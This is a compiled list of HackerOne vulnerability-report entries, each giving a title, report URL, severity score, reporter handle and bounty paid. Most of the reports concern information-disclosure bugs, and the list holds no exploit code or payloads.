Potentially vulnerable version of Apache software in and default files on https://iandunn.name/
#### URL
https://hackerone.com/reports/161459
#### Severity score
null
#### Reporter
ethnicalhacker
### Bounty paid
null
---
### Title
Passphrase credential lock bypass
#### URL
https://hackerone.com/reports/139626
#### Severity score
null
#### Reporter
vorpal
### Bounty paid
$300
---
### Title
Wordpress VIP leaks email of the test a/c
#### URL
https://hackerone.com/reports/540301
#### Severity score
5.3
#### Reporter
ajay_saycure
### Bounty paid
$100
---
### Title
Users contents on AWS is cacheable
#### URL
https://hackerone.com/reports/163131
#### Severity score
null
#### Reporter
abdullah
### Bounty paid
null
---
### Title
Directory Listing on https://promo-services-staging.brave.com
#### URL
https://hackerone.com/reports/371464
#### Severity score
null
#### Reporter
testingforbugs
### Bounty paid
null
---
### Title
Important information leaked on Github
#### URL
https://hackerone.com/reports/649322
#### Severity score
7.3
#### Reporter
mohanaddobal
### Bounty paid
null
---
### Title
Snippet JS template allows attacker to read a user's private snippets
#### URL
https://hackerone.com/reports/348443
#### Severity score
null
#### Reporter
jobert
### Bounty paid
$300
---
### Title
Retrieval and alteration of exposed media on Android Oreo
#### URL
https://hackerone.com/reports/462441
#### Severity score
5.9
#### Reporter
doragon
### Bounty paid
null
---
### Title
MISSING SPF (Sender Policy Framework) for meteorapm.com
#### URL
https://hackerone.com/reports/12341
#### Severity score
null
#### Reporter
atom
### Bounty paid
null
---
### Title
bug reporting template encourages users to paste config file with passwords
#### URL
https://hackerone.com/reports/196878
#### Severity score
null
#### Reporter
hanno
### Bounty paid
null
---
### Title
Test
#### URL
https://hackerone.com/reports/33153
#### Severity score
null
#### Reporter
mdlitch1973
### Bounty paid
null
---
### Title
Private/confidential setting of calendar events is ignored on activity stream
#### URL
https://hackerone.com/reports/476615
#### Severity score
null
#### Reporter
nickvergessen
### Bounty paid
null
---
### Title
List of a ton of internal twitter servers available on GitHub
#### URL
https://hackerone.com/reports/137404
#### Severity score
null
#### Reporter
a0005
### Bounty paid
null
---
### Title
API OAuth Public Key disclosure in mobile app
#### URL
https://hackerone.com/reports/160120
#### Severity score
null
#### Reporter
cablej
### Bounty paid
null
---
### Title
Source code disclosure at ███
#### URL
https://hackerone.com/reports/902322
#### Severity score
null
#### Reporter
0xd0ff
### Bounty paid
null
---
### Title
███ exposes sensitive shipment information to public web
#### URL
https://hackerone.com/reports/389116
#### Severity score
null
#### Reporter
cablej_dds
### Bounty paid
null
---
### Title
A 10GB file is reachable
#### URL
https://hackerone.com/reports/416516
#### Severity score
null
#### Reporter
apt-mirror
### Bounty paid
null
---
### Title
[vitrina.contact-sys.com] Full Path Disclosure
#### URL
https://hackerone.com/reports/178284
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$100
---
### Title
Disclosure of locally served nerdpacks due to nr-local.net CORS policy misconfiguration
#### URL
https://hackerone.com/reports/746786
#### Severity score
null
#### Reporter
skavans
### Bounty paid
$625
---
### Title
Directory index and information disclosure
#### URL
https://hackerone.com/reports/46345
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
$25
---
### Title
Referer Referer Header Leakage in language changer may lead to FB token theft
#### URL
https://hackerone.com/reports/870062
#### Severity score
3.8
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Brute Forcing rider-view Endpoint Allows for Counting Number of Active Uber Drivers
#### URL
https://hackerone.com/reports/127025
#### Severity score
null
#### Reporter
ddworken
### Bounty paid
null
---
### Title
Vine all registered user Private/sensitive information disclosure .[ Ip address/phone no/email and many other informations ]
#### URL
https://hackerone.com/reports/202823
#### Severity score
9.3
#### Reporter
0xprial
### Bounty paid
$7,560
---
### Title
ubernycmarketplace.com is vulnerable to the Heartbleed Bug
#### URL
https://hackerone.com/reports/304190
#### Severity score
null
#### Reporter
healdb
### Bounty paid
$1,500
---
### Title
Exposed ███████ Administrative Interface (ColdFusion 11)
#### URL
https://hackerone.com/reports/223948
#### Severity score
null
#### Reporter
jamesit
### Bounty paid
null
---
### Title
Banner Grabbing - Apache Server Version Disclousure
#### URL
https://hackerone.com/reports/269467
#### Severity score
null
#### Reporter
cybertiger
### Bounty paid
null
---
### Title
Existence of Folder path by guessing the path through response
#### URL
https://hackerone.com/reports/174645
#### Severity score
6.3
#### Reporter
ashish_r_padelkar
### Bounty paid
$250
---
### Title
ability to retrieve a user's phone-number/email for a given inviteCode
#### URL
https://hackerone.com/reports/178503
#### Severity score
null
#### Reporter
kushal89shah
### Bounty paid
$1,000
---
### Title
Unauthorized user is able to access schedule pipeline variables and values
#### URL
https://hackerone.com/reports/962462
#### Severity score
null
#### Reporter
vaib25vicky
### Bounty paid
$3,000
---
### Title
Weak Ciphers Enabled
#### URL
https://hackerone.com/reports/6488
#### Severity score
null
#### Reporter
yourdarkshadow
### Bounty paid
null
---
### Title
HTTP 401 response injection on "amp.twimg.com/amplify-web-player/prod/source.html" through "image_src" parameter
#### URL
https://hackerone.com/reports/221328
#### Severity score
null
#### Reporter
zlz
### Bounty paid
$560
---
### Title
Directory listening enabled in: 88.198.160.130
#### URL
https://hackerone.com/reports/156510
#### Severity score
null
#### Reporter
sandh0t
### Bounty paid
null
---
### Title
Information disclosure at http://sea-s2s.molthailand.com/status.php
#### URL
https://hackerone.com/reports/721761
#### Severity score
null
#### Reporter
t3ngu
### Bounty paid
$375
---
### Title
Bypassing one-time checkout router page (revealing payment information)
#### URL
https://hackerone.com/reports/271176
#### Severity score
null
#### Reporter
tolo7010
### Bounty paid
$100
---
### Title
Token leakage by referrer header & analytics
#### URL
https://hackerone.com/reports/252544
#### Severity score
null
#### Reporter
myster
### Bounty paid
$20
---
### Title
Information leakage through Graphviz blocks
#### URL
https://hackerone.com/reports/88395
#### Severity score
null
#### Reporter
jbeta
### Bounty paid
$300
---
### Title
Sensitive information disclosure
#### URL
https://hackerone.com/reports/207388
#### Severity score
null
#### Reporter
kothari
### Bounty paid
null
---
### Title
Report invitation links not restricted to any existing user
#### URL
https://hackerone.com/reports/214839
#### Severity score
2.7
#### Reporter
japz
### Bounty paid
$500
---
### Title
PHP and Wordpress version disclosure
#### URL
https://hackerone.com/reports/9516
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
Insecure transition from HTTP to HTTPS in form post
#### URL
https://hackerone.com/reports/123915
#### Severity score
null
#### Reporter
d0rkerdevil
### Bounty paid
null
---
### Title
Possible SSRF at URL Parameter while creating a new package repository
#### URL
https://hackerone.com/reports/151680
#### Severity score
null
#### Reporter
kiraak-boy
### Bounty paid
null
---
### Title
Multiple information disclosure
#### URL
https://hackerone.com/reports/37862
#### Severity score
null
#### Reporter
psych0tr1a
### Bounty paid
null
---
### Title
Fetch private list metadata and any user's personal name
#### URL
https://hackerone.com/reports/162822
#### Severity score
null
#### Reporter
sameoldstory
### Bounty paid
$150
---
### Title
[qiwi.com] Information Disclosure
#### URL
https://hackerone.com/reports/164168
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$150
---
### Title
[element.mail.ru] /.svn/entries
#### URL
https://hackerone.com/reports/187602
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Blacklist bypass on Callback URLs
#### URL
https://hackerone.com/reports/53004
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$100
---
### Title
Get analytics token using only apps permission
#### URL
https://hackerone.com/reports/901775
#### Severity score
null
#### Reporter
jmp_35p
### Bounty paid
$1,000
---
### Title
Legacy API exposes private video titles
#### URL
https://hackerone.com/reports/111386
#### Severity score
null
#### Reporter
nathonsecurity
### Bounty paid
$100
---
### Title
Registering with email [ +70 Chars ] Lead to Disclose some informations [Django Debug Mode ]
#### URL
https://hackerone.com/reports/963584
#### Severity score
null
#### Reporter
elmahdi
### Bounty paid
null
---
### Title
Private System Note Disclosure using GraphQL
#### URL
https://hackerone.com/reports/633001
#### Severity score
null
#### Reporter
ngalog
### Bounty paid
$1,000
---
### Title
Sensitive data disclosure via exposed phpunit file
#### URL
https://hackerone.com/reports/543775
#### Severity score
null
#### Reporter
l34r00t
### Bounty paid
null
---
### Title
Users can download old project exports due to unclaimed namespace
#### URL
https://hackerone.com/reports/195058
#### Severity score
4.8
#### Reporter
jobert
### Bounty paid
null
---
### Title
Leaking Of Sensitive Information on Github
#### URL
https://hackerone.com/reports/837733
#### Severity score
null
#### Reporter
harrisoft
### Bounty paid
null
---
### Title
Order notifications being sent for a deactivated staff account
#### URL
https://hackerone.com/reports/331223
#### Severity score
3.4
#### Reporter
newbie_101
### Bounty paid
$500
---
### Title
Web cache deception attack - expose token information
#### URL
https://hackerone.com/reports/397508
#### Severity score
6.5
#### Reporter
memon
### Bounty paid
$500
---
### Title
SSRF when importing a project from a git repo by URL
#### URL
https://hackerone.com/reports/135937
#### Severity score
null
#### Reporter
strukt
### Bounty paid
null
---
### Title
Server responds with the server error logs on account creation
#### URL
https://hackerone.com/reports/57692
#### Severity score
null
#### Reporter
crab
### Bounty paid
$50
---
### Title
Stored blind xss on showmax support team
#### URL
https://hackerone.com/reports/307485
#### Severity score
null
#### Reporter
mostafamamdoh
### Bounty paid
$256
---
### Title
Multiple Path Disclosure
#### URL
https://hackerone.com/reports/9485
#### Severity score
null
#### Reporter
anant
### Bounty paid
null
---
### Title
Default.aspx exposing full path and other info on wip.origin-community.xero.com
#### URL
https://hackerone.com/reports/122898
#### Severity score
null
#### Reporter
daveysec
### Bounty paid
null
---
### Title
Internal Ports Scanning via Blind SSRF
#### URL
https://hackerone.com/reports/281950
#### Severity score
null
#### Reporter
tungpun
### Bounty paid
null
---
### Title
Application error message
#### URL
https://hackerone.com/reports/148963
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$20
---
### Title
Making program preference -> program visibilty feature usless and disclosing API Identifier in the progress and data that may cause potential IDORS.
#### URL
https://hackerone.com/reports/929361
#### Severity score
3.8
#### Reporter
spongebhav
### Bounty paid
$500
---
### Title
Утечка информации через JSONP (XXSI)
#### URL
https://hackerone.com/reports/118418
#### Severity score
null
#### Reporter
cyberpunkych
### Bounty paid
null
---
### Title
Todos are not redacted when membership changes - Access to (confidential) issues and merge requests
#### URL
https://hackerone.com/reports/880863
#### Severity score
null
#### Reporter
vaib25vicky
### Bounty paid
$2,000
---
### Title
Full Path Disclosure by removing CSRF token
#### URL
https://hackerone.com/reports/150018
#### Severity score
null
#### Reporter
velby
### Bounty paid
null
---
### Title
Listing of Amazon S3 Bucket accessible to any amazon authenticated user (metrics.pscp.tv)
#### URL
https://hackerone.com/reports/278191
#### Severity score
null
#### Reporter
segumarc
### Bounty paid
$140
---
### Title
Sensitive data exposure via https://████████.mil/secure/QueryComponent!Default.jspa - CVE-2020-14179
#### URL
https://hackerone.com/reports/988550
#### Severity score
null
#### Reporter
r4d1kal
### Bounty paid
null
---
### Title
Server Name disclosure
#### URL
https://hackerone.com/reports/825815
#### Severity score
null
#### Reporter
julfikar
### Bounty paid
null
---
### Title
PII of Users Disclosure using "/members/invite/" endpoint
#### URL
https://hackerone.com/reports/787955
#### Severity score
7.1
#### Reporter
bonikia97
### Bounty paid
null
---
### Title
List of devices is accessible regardless of the account limitations
#### URL
https://hackerone.com/reports/97535
#### Severity score
null
#### Reporter
rms
### Bounty paid
$500
---
### Title
Access private list metadata
#### URL
https://hackerone.com/reports/178506
#### Severity score
null
#### Reporter
sameoldstory
### Bounty paid
$100
---
### Title
Ability to see password protected content by bypassing the password page of shopify preview URL for new development stores (as of August 17, 2020)
#### URL
https://hackerone.com/reports/961929
#### Severity score
6.4
#### Reporter
saltymermaid
### Bounty paid
$1,500
---
### Title
Disclosure of `payment_transactions` for programs via GraphQL query
#### URL
https://hackerone.com/reports/707433
#### Severity score
4.4
#### Reporter
msdian7
### Bounty paid
$2,500
---
### Title
doc.owncloud.com: PHP info page disclosure
#### URL
https://hackerone.com/reports/134216
#### Severity score
null
#### Reporter
nullenc0de
### Bounty paid
null
---
### Title
XSSI: Quick Navigation Interface - leak of private page/post titles
#### URL
https://hackerone.com/reports/495525
#### Severity score
null
#### Reporter
foobar7
### Bounty paid
$50
---
### Title
Twitter for android is exposing user's location to any installed android app
#### URL
https://hackerone.com/reports/185862
#### Severity score
null
#### Reporter
mishre
### Bounty paid
$560
---
### Title
GraphQL field on Team node can be used to determine if External Program runs invite-only program
#### URL
https://hackerone.com/reports/877642
#### Severity score
null
#### Reporter
kunal94
### Bounty paid
$2,500
---
### Title
Email enumeration at SignUp page
#### URL
https://hackerone.com/reports/666722
#### Severity score
null
#### Reporter
sheerwood
### Bounty paid
$100
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/186307
#### Severity score
null
#### Reporter
clizsec
### Bounty paid
null
---
### Title
Раскрытие информации о совершенных операциях
#### URL
https://hackerone.com/reports/497244
#### Severity score
null
#### Reporter
m4l0
### Bounty paid
$250
---
### Title
Information leakage of private program
#### URL
https://hackerone.com/reports/159526
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
$500
---
### Title
Просмотр любого видео из частной группы и кто загрузил
#### URL
https://hackerone.com/reports/319674
#### Severity score
null
#### Reporter
trainzment
### Bounty paid
$300
---
### Title
Disclosure of top 10 vulnerability types for programs that haven't enabled the Insights feature
#### URL
https://hackerone.com/reports/397031
#### Severity score
null
#### Reporter
tolo7010
### Bounty paid
$500
---
### Title
Access Grab_Road BigData Database via Open Presto coordinator
#### URL
https://hackerone.com/reports/266766
#### Severity score
null
#### Reporter
vinothkumar
### Bounty paid
$5,000
---
### Title
[ssrf] libav vulnerable during conversion of uploaded videos
#### URL
https://hackerone.com/reports/111269
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$1,500
---
### Title
Twitter Media Studio Source Information Disclosure With Analyst Role
#### URL
https://hackerone.com/reports/961757
#### Severity score
null
#### Reporter
gokay
### Bounty paid
$560
---
### Title
Monero can leak unitialized memory
#### URL
https://hackerone.com/reports/481164
#### Severity score
null
#### Reporter
guido
### Bounty paid
null
---
### Title
Deny access to download.nextcloud.com + folders
#### URL
https://hackerone.com/reports/146314
#### Severity score
null
#### Reporter
thearmfox
### Bounty paid
null
---
### Title
Information Disclosure of Garbage Collection Cycle 'Again'
#### URL
https://hackerone.com/reports/1026196
#### Severity score
null
#### Reporter
wasjerry
### Bounty paid
$100
---
### Title
Image Injection on `/bully/anniversaryedition` may lead to FB's OAuth Token Theft.
#### URL
https://hackerone.com/reports/659784
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
change bank account numbers
#### URL
https://hackerone.com/reports/90805
#### Severity score
6.5
#### Reporter
whit537
### Bounty paid
null
---
### Title
PHPinfo page
#### URL
https://hackerone.com/reports/367050
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Collected Telegraf Matrics Accessible
#### URL
https://hackerone.com/reports/881733
#### Severity score
null
#### Reporter
frankiexote
### Bounty paid
null
---
### Title
Subdomain Takeover
#### URL
https://hackerone.com/reports/180393
#### Severity score
null
#### Reporter
kholy
### Bounty paid
null
---
### Title
Access to Splunk at https://apt.ec2.shopify.com:8089
#### URL
https://hackerone.com/reports/158118
#### Severity score
null
#### Reporter
lewerkun
### Bounty paid
$500
---
### Title
Internal usage of AdBlockPlus may expose PoC URLs to unknown third-parties
#### URL
https://hackerone.com/reports/395518
#### Severity score
3.5
#### Reporter
dudez
### Bounty paid
null
---
### Title
web.xml configuration file disclosure
#### URL
https://hackerone.com/reports/173972
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$100
---
### Title
Attacker can extract list of private project's project members
#### URL
https://hackerone.com/reports/128051
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
Information disclosure
#### URL
https://hackerone.com/reports/261817
#### Severity score
null
#### Reporter
cuso4
### Bounty paid
null
---
### Title
[crossdomain.xml] Dangerous Flash Cross-Domain Policy
#### URL
https://hackerone.com/reports/105655
#### Severity score
null
#### Reporter
zephrfish
### Bounty paid
$50
---
### Title
H1514 Extract information about other sites (new sites) through Affiliate/Referral pages
#### URL
https://hackerone.com/reports/423506
#### Severity score
4.3
#### Reporter
rijalrojan
### Bounty paid
$1,000
---
### Title
doc.owncloud.org has missing PHP handler
#### URL
https://hackerone.com/reports/121382
#### Severity score
null
#### Reporter
cjusten
### Bounty paid
null
---
### Title
Full Path Disclosure on [smarthistory.khanacademy.org]
#### URL
https://hackerone.com/reports/6362
#### Severity score
null
#### Reporter
gsalazar
### Bounty paid
null
---
### Title
Open prod Jenkins instance
#### URL
https://hackerone.com/reports/231460
#### Severity score
null
#### Reporter
preben
### Bounty paid
$15,000
---
### Title
Requested and received edit access to Google form
#### URL
https://hackerone.com/reports/130440
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
Able to list user's public name, username, phone number, address, facebook ID...
#### URL
https://hackerone.com/reports/167206
#### Severity score
null
#### Reporter
lukeberner
### Bounty paid
null
---
### Title
View liked twits of private account via publish.twitter.com
#### URL
https://hackerone.com/reports/174721
#### Severity score
null
#### Reporter
kedrisch-4-t
### Bounty paid
$1,260
---
### Title
Reading redacted data via hackbot's answers
#### URL
https://hackerone.com/reports/247628
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$1,500
---
### Title
Path Disclosure (Info Disclosure) in http://www.localize.io
#### URL
https://hackerone.com/reports/7903
#### Severity score
null
#### Reporter
quistertow
### Bounty paid
null
---
### Title
Local File Inclusion vulnerability on an Army system allows downloading local files
#### URL
https://hackerone.com/reports/183978
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
null
---
### Title
Exploiting JSONP callback on /username/charts.json endpoint leads to information disclosure despite user's privacy settings
#### URL
https://hackerone.com/reports/361951
#### Severity score
4.3
#### Reporter
kapytein
### Bounty paid
$50
---
### Title
Banner Grabbing - Apache Server Version Disclousure
#### URL
https://hackerone.com/reports/269449
#### Severity score
null
#### Reporter
cybertiger
### Bounty paid
null
---
### Title
Information disclosure in mmap module - python 2.7.12
#### URL
https://hackerone.com/reports/174632
#### Severity score
3.7
#### Reporter
aerodudrizzt
### Bounty paid
$500
---
### Title
Smuggle SocialClub's Facebook OAuth Code via Referer Leakage
#### URL
https://hackerone.com/reports/342709
#### Severity score
null
#### Reporter
1hack0
### Bounty paid
$750
---
### Title
Information Disclosure (phpinfo())
#### URL
https://hackerone.com/reports/17514
#### Severity score
null
#### Reporter
yourdarkshadow
### Bounty paid
null
---
### Title
warofdragons.my.games: configuration files with database account are accessible
#### URL
https://hackerone.com/reports/786609
#### Severity score
6.1
#### Reporter
iframe
### Bounty paid
$150
---
### Title
Customer's full name disclosure via Shopify Chat (by email lookup)
#### URL
https://hackerone.com/reports/1018336
#### Severity score
null
#### Reporter
francisbeaudoin
### Bounty paid
$500
---
### Title
LIsting of http://archive.uber.com/pypi/simple/
#### URL
https://hackerone.com/reports/125068
#### Severity score
null
#### Reporter
bugme
### Bounty paid
null
---
### Title
Labels created in private projects are leaked
#### URL
https://hackerone.com/reports/132777
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
Staff with no permissions can listen to Shopify Ping conversations by registering to its different WebSocket Events
#### URL
https://hackerone.com/reports/1023669
#### Severity score
null
#### Reporter
francisbeaudoin
### Bounty paid
$800
---
### Title
Incomplete HTML sanitization + Session id leaking + private information disclosure
#### URL
https://hackerone.com/reports/200487
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$200
---
### Title
Publicly accessible .svn repository - aastraconf.packet8.net
#### URL
https://hackerone.com/reports/710368
#### Severity score
null
#### Reporter
madrobot
### Bounty paid
null
---
### Title
Leaking sensitive files on Github leads to internal files (python scripts,SQL files)
#### URL
https://hackerone.com/reports/301831
#### Severity score
null
#### Reporter
xsam
### Bounty paid
$4,000
---
### Title
Report title autocompletion
#### URL
https://hackerone.com/reports/263
#### Severity score
null
#### Reporter
janpaul123
### Bounty paid
null
---
### Title
Log files Leaked In mcsblog.ru
#### URL
https://hackerone.com/reports/909166
#### Severity score
6.1
#### Reporter
sniper302
### Bounty paid
$150
---
### Title
Wordpress Users Disclosure (/wp-json/wp/v2/users/)
#### URL
https://hackerone.com/reports/356047
#### Severity score
5.3
#### Reporter
legalizenepal
### Bounty paid
$50
---
### Title
Information Disclosure (FPD) - stopthehacker.com
#### URL
https://hackerone.com/reports/8780
#### Severity score
null
#### Reporter
quistertow
### Bounty paid
null
---
### Title
Rails application running in development mode
#### URL
https://hackerone.com/reports/518196
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
Preferred language option fingerprinting issue in Tor Browser
#### URL
https://hackerone.com/reports/281597
#### Severity score
null
#### Reporter
xiaoyinl
### Bounty paid
null
---
### Title
Disclosure of the name of a program that has a private part with an external link
#### URL
https://hackerone.com/reports/871142
#### Severity score
3.4
#### Reporter
haxta4ok00
### Bounty paid
$500
---
### Title
.git file accessible
#### URL
https://hackerone.com/reports/686805
#### Severity score
null
#### Reporter
nitrozeus0x01
### Bounty paid
null
---
### Title
https://217.69.135.63/rb/: money.mail.ru sources disclosure
#### URL
https://hackerone.com/reports/13482
#### Severity score
null
#### Reporter
isox
### Bounty paid
$1,000
---
### Title
Leak IP internal
#### URL
https://hackerone.com/reports/271700
#### Severity score
null
#### Reporter
h1danilabs
### Bounty paid
$150
---
### Title
View storyboard of private video @ ht.pornhub.com
#### URL
https://hackerone.com/reports/138703
#### Severity score
null
#### Reporter
kaimi
### Bounty paid
$750
---
### Title
Internal bounty and swag details disclosed as part of JSON response
#### URL
https://hackerone.com/reports/81083
#### Severity score
null
#### Reporter
techguynoob
### Bounty paid
$500
---
### Title
Leakage badges on disabled user
#### URL
https://hackerone.com/reports/325594
#### Severity score
null
#### Reporter
e333jsjs7se
### Bounty paid
null
---
### Title
Image Injection Vulnerability on /bully/screens
#### URL
https://hackerone.com/reports/661646
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Information disclosure on a DoD website
#### URL
https://hackerone.com/reports/189414
#### Severity score
null
#### Reporter
khizer47
### Bounty paid
null
---
### Title
ОДМИН ТЭСТ
#### URL
https://hackerone.com/reports/452016
#### Severity score
4
#### Reporter
linkks
### Bounty paid
$150
---
### Title
WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)
#### URL
https://hackerone.com/reports/696198
#### Severity score
null
#### Reporter
j4tayu
### Bounty paid
null
---
### Title
source code leak
#### URL
https://hackerone.com/reports/451077
#### Severity score
5.3
#### Reporter
linkks
### Bounty paid
$150
---
### Title
Phishing user to download malicious app could lead to leakage of User Access Token, Email, Name and Profile photo via exported RemoteService
#### URL
https://hackerone.com/reports/384257
#### Severity score
null
#### Reporter
libcontainer
### Bounty paid
$300
---
### Title
Exposed Git Repo at http://fileserver.dropboxbusiness.com
#### URL
https://hackerone.com/reports/317119
#### Severity score
null
#### Reporter
todayisnew
### Bounty paid
$1,024
---
### Title
Source Code Disclosure
#### URL
https://hackerone.com/reports/216336
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
People who interviewed for HackerOne security analyst position can be enumerated and their personal email address may be exposed
#### URL
https://hackerone.com/reports/353310
#### Severity score
2.9
#### Reporter
r3naissance
### Bounty paid
$500
---
### Title
HTML injection and information disclosure in support panel
#### URL
https://hackerone.com/reports/634312
#### Severity score
5.8
#### Reporter
xaleraf4ra
### Bounty paid
null
---
### Title
Browser Self XSS Protection not implemented
#### URL
https://hackerone.com/reports/400785
#### Severity score
null
#### Reporter
allenaleen
### Bounty paid
null
---
### Title
[otus.p.mail.ru] Full Path Disclosure
#### URL
https://hackerone.com/reports/99262
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
### Title
Information disclosure on a DoD website
#### URL
https://hackerone.com/reports/186317
#### Severity score
null
#### Reporter
r0p3
### Bounty paid
null
---
### Title
Verification of E-Mail address possible on https://biz.yelp.com/login and https://biz.yelp.com/forgot
#### URL
https://hackerone.com/reports/166265
#### Severity score
null
#### Reporter
badagent
### Bounty paid
$500
---
### Title
Google Authenticator0.6 - PHP Version Dosclosure
#### URL
https://hackerone.com/reports/172609
#### Severity score
null
#### Reporter
iamsha4yan
### Bounty paid
null
---
### Title
TeamProfile exposes partially sensitive information through GraphQL
#### URL
https://hackerone.com/reports/389600
#### Severity score
3.8
#### Reporter
0619
### Bounty paid
$500
---
### Title
Bypass of image rewriting / tracking blocker via srcset
#### URL
https://hackerone.com/reports/1021885
#### Severity score
4.7
#### Reporter
foobar7
### Bounty paid
$1,000
---
### Title
Открытая админка Tarantool
#### URL
https://hackerone.com/reports/914472
#### Severity score
6.1
#### Reporter
0x01alka
### Bounty paid
$500
---
### Title
XXE in the Connector Designer
#### URL
https://hackerone.com/reports/112116
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$750
---
### Title
Internet-based attacker can run Flash apps in local sandboxes by using special URL schemes (PSIRT-3299, CVE-2015-3079)
#### URL
https://hackerone.com/reports/73276
#### Severity score
null
#### Reporter
jouko
### Bounty paid
$2,000
---
### Title
Insecure Direct Member Disclosure
#### URL
https://hackerone.com/reports/123501
#### Severity score
null
#### Reporter
zuh4n
### Bounty paid
null
---
### Title
Information Disclosure in /skills call
#### URL
https://hackerone.com/reports/188719
#### Severity score
6.5
#### Reporter
deepankerchawla
### Bounty paid
$10,000
---
### Title
IDOR - Leaking other user's folder names from /appsuite/api/import?action=ICA
#### URL
https://hackerone.com/reports/199281
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$300
---
### Title
Private Program all members disclosed
#### URL
https://hackerone.com/reports/283309
#### Severity score
null
#### Reporter
vulnh0lic
### Bounty paid
null
---
### Title
Some store settings/data are accessible to "No Access" permission users on GraphQL LiveView operation
#### URL
https://hackerone.com/reports/409973
#### Severity score
null
#### Reporter
tolo7010
### Bounty paid
$500
---
### Title
Disclosure of ways to the site root
#### URL
https://hackerone.com/reports/129027
#### Severity score
null
#### Reporter
cyberunit
### Bounty paid
null
---
### Title
Source Code Disclosure (CGI)
#### URL
https://hackerone.com/reports/211418
#### Severity score
5.3
#### Reporter
cyberunit
### Bounty paid
$150
---
### Title
Unrestricted File Download / Path Traversal
#### URL
https://hackerone.com/reports/183925
#### Severity score
null
#### Reporter
ziot
### Bounty paid
null
---
### Title
[staging-engineering.gnip.com] Publicly accessible GIT directory
#### URL
https://hackerone.com/reports/218465
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$280
---
### Title
don't expose path of Python
#### URL
https://hackerone.com/reports/138659
#### Severity score
null
#### Reporter
tbehroz
### Bounty paid
null
---
### Title
PHP and Web Server version disclosed on leasewebnoc.com
#### URL
https://hackerone.com/reports/117385
#### Severity score
null
#### Reporter
bugs3ra
### Bounty paid
null
---
### Title
[product360.informatica.com] Unauthenticated Apache Tomcat 8 Installation
#### URL
https://hackerone.com/reports/146436
#### Severity score
null
#### Reporter
zephrfish
### Bounty paid
null
---
### Title
https://portal.nextcloud.com/.htaccess file is readable
#### URL
https://hackerone.com/reports/220946
#### Severity score
null
#### Reporter
peeper35
### Bounty paid
null
---
### Title
suppress version in Server header on gratipay.com or grtp.co
#### URL
https://hackerone.com/reports/123742
#### Severity score
null
#### Reporter
caffeine
### Bounty paid
$1
---
### Title
Discrepancy in hacker profile report count may reveal existence of a private program by publishing a report
#### URL
https://hackerone.com/reports/410015
#### Severity score
5
#### Reporter
haxta4ok00
### Bounty paid
$3,000
---
### Title
Cross-site information assertion leak via Content Security Policy
#### URL
https://hackerone.com/reports/16910
#### Severity score
null
#### Reporter
zemnmez
### Bounty paid
null
---
### Title
Password protected rooms total number of viewers disclosure to unauthorized members
#### URL
https://hackerone.com/reports/411822
#### Severity score
null
#### Reporter
batee5a
### Bounty paid
$100
---
### Title
https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)
#### URL
https://hackerone.com/reports/6475
#### Severity score
null
#### Reporter
g4mm4
### Bounty paid
null
---
### Title
c2fo.com is releasing sensitive Information about Database Configuration.
#### URL
https://hackerone.com/reports/6491
#### Severity score
null
#### Reporter
exploitprotocol
### Bounty paid
null
---
### Title
OAuth `redirect_uri` bypass using IDN homograph attack resulting in user's access token leakage
#### URL
https://hackerone.com/reports/861940
#### Severity score
6.4
#### Reporter
yassineaboukir
### Bounty paid
$1,000
---
### Title
Disclose any user's private email through API
#### URL
https://hackerone.com/reports/196655
#### Severity score
4.3
#### Reporter
zombiehelp54
### Bounty paid
$2,000
---
### Title
[H1-2006 2020] H1-2006 CTF Writeup
#### URL
https://hackerone.com/reports/887611
#### Severity score
null
#### Reporter
nytr0gen
### Bounty paid
null
---
### Title
Simple CSS line-height identifies platform
#### URL
https://hackerone.com/reports/256647
#### Severity score
null
#### Reporter
hackerfactor
### Bounty paid
$100
---
### Title
Extremly simple way to bypass Nextcloud-Client PIN/Fingerprint lock
#### URL
https://hackerone.com/reports/331489
#### Severity score
2.1
#### Reporter
volker_weissmann
### Bounty paid
$100
---
### Title
reports.breadcrumb.com is vulnerable for Arbitrary file existence disclosur CVE-2014-7829
#### URL
https://hackerone.com/reports/329218
#### Severity score
null
#### Reporter
s3curityb3ast
### Bounty paid
$200
---
### Title
help.nextcloud Email Address/Username enumeration
#### URL
https://hackerone.com/reports/145734
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
Apache Documentation
#### URL
https://hackerone.com/reports/8055
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
null
---
### Title
Confidential issues leaked in public projects when attached to milestone
#### URL
https://hackerone.com/reports/134300
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
Просмотр приложений любого пользователя / группы
#### URL
https://hackerone.com/reports/364095
#### Severity score
null
#### Reporter
trainzment
### Bounty paid
$500
---
### Title
Server version disclosure: team.uberinternal.com
#### URL
https://hackerone.com/reports/146327
#### Severity score
null
#### Reporter
benoculars
### Bounty paid
